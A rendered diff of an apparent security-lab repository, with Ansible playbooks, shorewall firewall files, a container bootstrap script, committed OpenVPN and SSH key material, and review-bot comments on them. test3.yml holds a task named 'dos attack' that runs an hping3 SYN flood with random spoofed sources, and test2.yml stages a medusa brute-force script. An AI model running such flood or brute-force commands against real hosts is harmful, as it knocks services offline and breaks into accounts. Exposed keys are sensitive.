99196bd9edb0da94b5c9209debd8d455
41bce3ed5f5631031775359d49e49d87
8af81b53e7f909d1b47a1fbc03e2206b
98bf518e41a43da80a652e19e39dae39
7fa5ab1a7aff1b141b1952c1f61296b1
363fc7a891a21acc354253e9a6a5123f
8e36e40b486b7ba40542f77749b45bf5
27b5899c26333e11a18e90a6857f3c36
49abe06d3afabee6f97cbc65fcc6e74e
6db46cd53e71ef4412b7328a278e9de2
d50adaf4c942600aba4c011fa04d1368
87ffd6f73adc9b7a772efb570e59f798
e8cdd96c8dbc018535c3e04170dd309d
1809e77f2f216d6fc95d706ae5400eab
-----END OpenVPN Static key V1-----
</tls-auth>

2
project/second_script.sh

@ -0,0 +1,2 @@
ansible-playbook -u docker -i inventory_w.yml test2.yml -f 4 --ask-pass --ask-become-pass
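Review bot: The script has no interpreter line, unlike project/sshkey_script.sh which starts with `#!/bin/bash`, so it only works when invoked as `sh second_script.sh` and fails when run as an executable; add `#!/bin/sh` as the first line. The header counts two added lines but only one is visible here, so the second is presumably blank.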

4
project/sshkey_script.sh

@ -0,0 +1,4 @@
#!/bin/bash
ssh-keygen
ssh-copy-id docker@172.21.0.6
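Review bot: `ssh-keygen` with no arguments prompts interactively for the key path and passphrase and asks before overwriting an existing key, so the script cannot run unattended and a second run is unpredictable; pass an explicit type and path, e.g. `ssh-keygen -t ed25519 -f "$HOME/.ssh/id_ed25519"`, and point `ssh-copy-id -i` at that public key. The target `docker@172.21.0.6` is hard-coded while the playbooks address hosts through the inventory, so taking the host from `$1` keeps the script usable when the lab network changes. Note also that this same commit adds a ready-made key pair under ssh/, which makes the generation here redundant and, more importantly, shares a single private key across every checkout.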

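--- a/project/test-ping.retry
+++ b/project/test-ping.retry
@@ -0,0 +1,5 @@
+172.27.0.2
+172.27.0.3
+172.27.0.4
+172.27.0.5
+172.27.0.6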

27
project/test-ping.yml

@ -0,0 +1,27 @@
---
- hosts: service
remote_user: docker
sudo: yes
gather_facts: no
vars:
user: "docker"
tasks:
# ping async
- name: pingtome
command: ping 10.80.0.2
async: 30
poll: 0
- name: Refresh connection
meta: clear_host_errors
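Review bot: `sudo: yes` at the play level is the pre-2.0 privilege-escalation keyword that Ansible removed in 2.9; it should be `become: yes`, and the same line appears in project/test.yml, project/test2.yml, project/test3.yml, project/test_fail2ban.yml and project/test_iptables_rules.yml. The `pingtome` task runs `ping 10.80.0.2` with no `-c` count and `poll: 0`, so it is fire-and-forget and only the `async: 30` timeout ends it; if the intent is a reachability check, a synchronous `command: ping -c 3 10.80.0.2` gives a pass/fail result the play can act on. Indentation appears to have been lost in rendering (and the header counts 27 lines against 15 visible), so the YAML structure cannot be verified from this view.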

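--- a/project/test.retry
+++ b/project/test.retry
@@ -0,0 +1,5 @@
+172.27.0.2
+172.27.0.3
+172.27.0.4
+172.27.0.5
+172.27.0.6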

113
project/test.yml

@ -0,0 +1,113 @@
---
- hosts: service
remote_user: docker
sudo: yes
gather_facts: no
vars:
user: "docker"
tasks:
# make directory
- name: make dir for data
become: true
file:
path: "/var/lab/playground/playground-readmongo"
state: directory
owner: docker
group: docker
mode: '0777'
# pare google.com
# - name: google.com
# become: yes
# become_user: "{{ user }}"
# command: curl http://www.google.com
# ignore_errors: yes
# register: configwww
# - name: ls configwww
# debug: var=configwww.stdout_lines
# rm dir
# - name: remove dir
# become: yes
# become_user: "{{ user }}"
# command: rmdir new_dir
# ignore_errors: yes
# register: rmvdir
# - name: ls rmvdir
# debug: var=rmvdir.stdout_lines
# transfer script iptables gia er. 1
- name: Transfer script iptables_rules.
copy: src=iptables_rules.sh dest=/home/docker mode=0777
# transfer script fail2ban gia er.2
- name: Transfer script fail2ban.
copy: src=fail2ban_script.sh dest=/home/docker mode=0777
# install openvpn gia er.4
- name: Ansible apt install openvpn.
become: true
apt:
name: openvpn
state: present
update_cache: true
# install fail2ban gia er.2
- name: Ansible apt install fail2ban.
become: true
apt:
name: fail2ban
state: present
update_cache: true
# ls -al for testing
- name: ls -al
become: yes
become_user: "{{ user }}"
command: ls -al #/etc
ignore_errors: yes
register: config
- name: ls config
debug: var=config.stdout_lines
# netstat -antlupe
# - name: netstat
# become: yes
# become_user: "{{ user }}"
# command: netstat -antlupe
# ignore_errors: yes
# register: ant
# - name: ls ant
# debug: var=ant.stdout_lines
- name: Refresh connection
meta: clear_host_errors
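Review bot: `mode: '0777'` on the `/var/lab/playground/playground-readmongo` directory and `mode=0777` on both copied scripts make them world-writable, so any local account on the host can replace a script that project/test_fail2ban.yml and project/test_iptables_rules.yml later execute from /home/docker. `0755` is sufficient for a directory and for scripts that are executed, or `0750` if only the docker user needs them; the same `mode=0777` appears on the copies in project/test2.yml. The `ls -al` task with `ignore_errors: yes` and a `debug` of its output looks like a leftover test step and could be removed before this is used as a baseline play. The header counts 113 added lines but far fewer are visible here and indentation is lost in rendering, so some content of the play may be missing from this view.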

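--- a/project/test2.retry
+++ b/project/test2.retry
@@ -0,0 +1,4 @@
+172.27.0.3
+172.27.0.4
+172.27.0.5
+172.27.0.6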

76
project/test2.yml

@ -0,0 +1,76 @@
---
- hosts: service
remote_user: docker
sudo: yes
gather_facts: no
vars:
user: "docker"
tasks:
# ls -al test
# - name: ls -al
# become: yes
# become_user: "{{ user }}"
# command: ls -al
# ignore_errors: yes
# register: config
# - name: ls config
# debug: var=config.stdout_lines
# transfer script update
- name: Transfer script.
copy: src=script_update.sh dest=/home/docker mode=0777
# exec script
- name: Exec script_update.
command: sh /home/docker/script_update.sh
# transfer script iptables
# - name: Transfer script iprules.
# copy: src=iptables_rules.sh dest=/home/docker mode=0777
# transfer script imedusa
- name: Transfer script medusa.
copy: src=medusa_script.sh dest=/home/docker mode=0777
# transfer script fail2ban
# - name: Transfer script fail2ban.
# copy: src=fail2ban_script.sh dest=/home/docker mode=0777
# transfer script sshkey_script
# - name: Transfer script sshkey.
# copy: src=sshkey_script.sh dest=/home/docker mode=0777
# install hping3
- name: Ansible apt install hping3.
become: true
apt:
name: hping3
state: present
update_cache: true
# install sshpass
- name: Ansible apt install sshpass.
become: true
apt:
name: sshpass
state: present
update_cache: true
# refresh
- name: Refresh connection
meta: clear_host_errors
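Review bot: The `Exec script_update.` task runs the file with `command: sh /home/docker/script_update.sh`, which reports `changed` on every run and has no idempotence guard; the `script` module would copy and execute in one step and replace the preceding `Transfer script.` task, or at least add `changed_when: false` or `args: creates:` to the command task. Because the script is read by `sh`, the execute and world-write bits granted by `mode=0777` on the copy are not needed either. The commented-out `Transfer script sshkey.` task suggests key-based SSH was intended; once keys are in place, `sshpass` (which exposes the password in the process list of the target) should not be necessary, so it is worth confirming that its installation is still required.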

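--- a/project/test3.retry
+++ b/project/test3.retry
@@ -0,0 +1,4 @@
+172.29.0.3
+172.29.0.4
+172.29.0.5
+172.29.0.6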

60
project/test3.yml

@ -0,0 +1,60 @@
---
- hosts: service
remote_user: docker
sudo: yes
gather_facts: no
vars:
user: "docker"
tasks:
# ls -al
# - name: ls -al
# become: yes
# become_user: "{{ user }}"
# command: ls -al
# ignore_errors: yes
# register: config2
# - name: ls config2
# debug: var=config2.stdout_lines
# dos attack async
- name: dos attack
command: sudo hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.21.0.2 -y
async: 120
poll: 0
# ls -al
# - name: ls -al
# become: yes
# become_user: "{{ user }}"
# command: ls -al
# ignore_errors: yes
# register: config3
- name: ls config3
debug: var=config3.stdout_lines
- name: Refresh connection
meta: clear_host_errors
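Review bot: The `ls config3` task at the end debugs `config3.stdout_lines`, but the only `register: config3` is inside the commented-out block above it, so the task prints `VARIABLE IS NOT DEFINED!` on every run; either restore the registering task or drop the debug task. The `dos attack` task prefixes its command with `sudo` instead of using `become: true` like the apt tasks elsewhere in the project, which bypasses Ansible's become handling (including `--ask-become-pass`) and fails wherever sudo requires a tty or a password. Indentation is lost in rendering and the header counts 60 lines against 33 visible, so the play's structure cannot be fully checked here.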

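--- a/project/test_fail2ban.retry
+++ b/project/test_fail2ban.retry
@@ -0,0 +1,5 @@
+172.27.0.2
+172.27.0.3
+172.27.0.4
+172.27.0.5
+172.27.0.6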

21
project/test_fail2ban.yml

@ -0,0 +1,21 @@
---
- hosts: service
remote_user: docker
sudo: yes
gather_facts: no
vars:
user: "docker"
tasks:
# exec script fail2ban
- name: Exec fail2ban_script.
command: sh /home/docker/fail2ban_script.sh
- name: Refresh connection
meta: clear_host_errors
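Review bot: `Exec fail2ban_script.` runs `sh /home/docker/fail2ban_script.sh` without `become`, yet configuring fail2ban needs root; unless the script escalates internally (its body is not in this view) the task fails on permissions, and the same applies to `Exec iptables_rules.sh.` in project/test_iptables_rules.yml. Add `become: true` to the task, consistent with the apt tasks in project/test.yml, and consider `changed_when` or `args: creates:` so reruns are idempotent. The `sudo: yes` play keyword is shared with the other playbooks in this commit.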

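--- a/project/test_iptables_rules.retry
+++ b/project/test_iptables_rules.retry
@@ -0,0 +1,5 @@
+172.27.0.2
+172.27.0.3
+172.27.0.4
+172.27.0.5
+172.27.0.6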

21
project/test_iptables_rules.yml

@ -0,0 +1,21 @@
---
- hosts: service
remote_user: docker
sudo: yes
gather_facts: no
vars:
user: "docker"
tasks:
# exec script iptables
- name: Exec iptables_rules.sh.
command: sh /home/docker/iptables_rules.sh
- name: Refresh connection
meta: clear_host_errors

72
sec_bootstrap

@ -0,0 +1,72 @@
#!/bin/sh
ROLE="undefined"
MPI_MASTER_SERVICE_NAME="sec_master"
MPI_WORKER_SERVICE_NAME="sec_worker"
HOSTNAMES="/etc/nethosts"
#######################
# ARGUMENTS PARSER
while [ "$1" != "" ];
do
PARAM=$(echo "$1" | awk -F= '{print $1}')
VALUE=$(echo "$1" | awk -F= '{print $2}')
case $PARAM in
role)
[ "$VALUE" ] && ROLE=$VALUE
;;
sec_master_service_name)
[ "$VALUE" ] && MPI_MASTER_SERVICE_NAME=$VALUE
;;
sec_worker_service_name)
[ "$VALUE" ] && MPI_WORKER_SERVICE_NAME=$VALUE
;;
*)
echo "ERROR: unknown parameter \"$PARAM\""
exit 1
;;
esac
shift
done
cat > /etc/opt/service_names <<- EOF
MPI_MASTER_SERVICE_NAME=${MPI_MASTER_SERVICE_NAME}
MPI_WORKER_SERVICE_NAME=${MPI_WORKER_SERVICE_NAME}
EOF
case $ROLE in
"master")
# Auto update default host file in background and dumb all output
auto_update_hosts "${HOSTNAMES}" > /dev/null 2>&1 &
# Start ssh server
/usr/sbin/sshd -D
;;
"worker")
# Start ssh server in background
/usr/sbin/sshd -D &
# Keep trying to connect to master node and stay there indefinitely so that master node can see
# the connected hosts that are ready for MPI work
while sleep 1
do
# shellcheck disable=SC2086
ssh -T -o "StrictHostKeyChecking no" \
-i "${USER_HOME}/.ssh/id_rsa" \
${USER}@${MPI_MASTER_SERVICE_NAME} \
"tail -f /dev/null"
done
;;
*)
echo 'role argument only accepts "master" or "worker"'
esac
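Review bot: The `*)` branch of the final `case $ROLE` prints the usage message but falls through to exit status 0, so a container started with a missing or bad `role=` (ROLE defaults to `undefined`) stops quietly as if it had succeeded, unlike the argument parser above which exits 1 on an unknown parameter; change it to `echo 'role argument only accepts "master" or "worker"' >&2` followed by `exit 1`. The worker loop's `ssh -o "StrictHostKeyChecking no"` accepts whatever host key answers for the master service name, so the session has no protection against a substituted host; since the image already ships its own key material, the master's host key can be distributed the same way into `known_hosts`, or at minimum `StrictHostKeyChecking=accept-new` used. `USER_HOME` and `USER` are used on the ssh line but never set in this script, so they presumably come from the image environment and a comment naming where would help the next reader. The header counts 72 added lines but fewer are visible here, and indentation is lost in rendering.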

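--- a/shorewall/interfaces
+++ b/shorewall/interfaces
@@ -0,0 +1,6 @@
+### Comments, comments, and more comments.
+#
+#ZONE INTERFACE BROADCAST OPTIONS
+#
+net eth0 detect tcpflags,nosmurfs
+#LAST LINE -- ADD YOUR ENTRIES BEFORE THIS ONE -- DO NOT REMOVE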

11
shorewall/policy

@ -0,0 +1,11 @@
### Comments, comments, and more comments.
#SOURCE DEST POLICY LOG LEVEL LIMIT:BURST
#
net fw ACCEPT
fw net ACCEPT
net all DROP
# THE FOLLOWING POLICY MUST BE LAST
all all REJECT info
#LAST LINE -- ADD YOUR ENTRIES ABOVE THIS LINE -- DO NOT REMOVE
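Review bot: `net fw ACCEPT` at the top of the policy file admits every inbound connection from the `net` zone to the firewall host, and since policies are matched first-hit it makes the later `net all DROP` and the entire shorewall/rules file (all entries commented out) ineffective for the host itself. Default-deny is `net fw DROP info` here, with the services that must be reachable enabled as explicit ACCEPT rules in shorewall/rules (the commented `#ACCEPT net fw tcp 80` line is the template). `fw net ACCEPT` for outbound traffic is the usual choice and can stay.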

11
shorewall/rules

@ -0,0 +1,11 @@
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/
# PORT PORT(S) DEST LIMIT GROUP
#ACCEPT net fw tcp 80
#ACCEPT fw net tcp 80
#ACCEPT net fw udp 53
#ACCEPT fw net udp 53
#REJECT net fw udp 53
#REJECT fw net udp 53
#ACCEPT net:14.15.16.112/27 fw icmp 8
#LAST LINE -- ADD YOUR ENTRIES BEFORE THIS ONE -- DO NOT REMOVE

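--- a/shorewall/zones
+++ b/shorewall/zones
@@ -0,0 +1,6 @@
+### Comments, comments, and more comments.
+#ZONE TYPE OPTIONS IN OUT
+# OPTIONS OPTIONS
+fw firewall
+net ipv4
+#LAST LINE - ADD YOUR ENTRIES ABOVE THIS ONE - DO NOT REMOVE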

27
ssh/id_rsa

@ -0,0 +1,27 @@
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
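Review bot: This adds an RSA private key to the repository, together with its public half in ssh/id_rsa.pub (whose trailing comment names the user and machine it was generated on), so every clone holds the credential that sec_bootstrap presumably loads as `${USER_HOME}/.ssh/id_rsa` to log into the master node. Treat the key as compromised: generate a new pair outside the repository, remove this one from the git history rather than only deleting it in a later commit, and bring keys in at build or run time (a BuildKit `--mount=type=secret`/`type=ssh`, or a volume) instead of committing them. A `.gitignore` entry for `ssh/id_rsa` would prevent a repeat.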

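--- a/ssh/id_rsa.pub
+++ b/ssh/id_rsa.pub
@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCgobUO2MxccMl8Xn1jmc7tiXfx+SNEvUtCEXtFkpsZJxYE0hZ+gBLTCt3fBSd3lgy0h6IGP3wf5XwgSfQKEADEZ8deqqaZiVToAERIg2hv6HvQGeZTCJFtGcDrijd335zPZPxgt/7Wnv//9nwsDxT7utL6S8q+1gJD2WUMDG1t7f0LEKzYcBJqbdTpUCur1J1KqmHky50FpiFrHHhXxUN1cSEbamKaWHx7vN09nwBhtgssOGpi137Cf1rMtc9DfD+8L4+fi1pQFieURENjjm9pWw92dH5qj1yQwtRLoTAlVCaAzMHbLI0Js9Bi9E8vSvGgay18KaaNjcTM6HqQQDrD nlknguyen@NN-Ubuntu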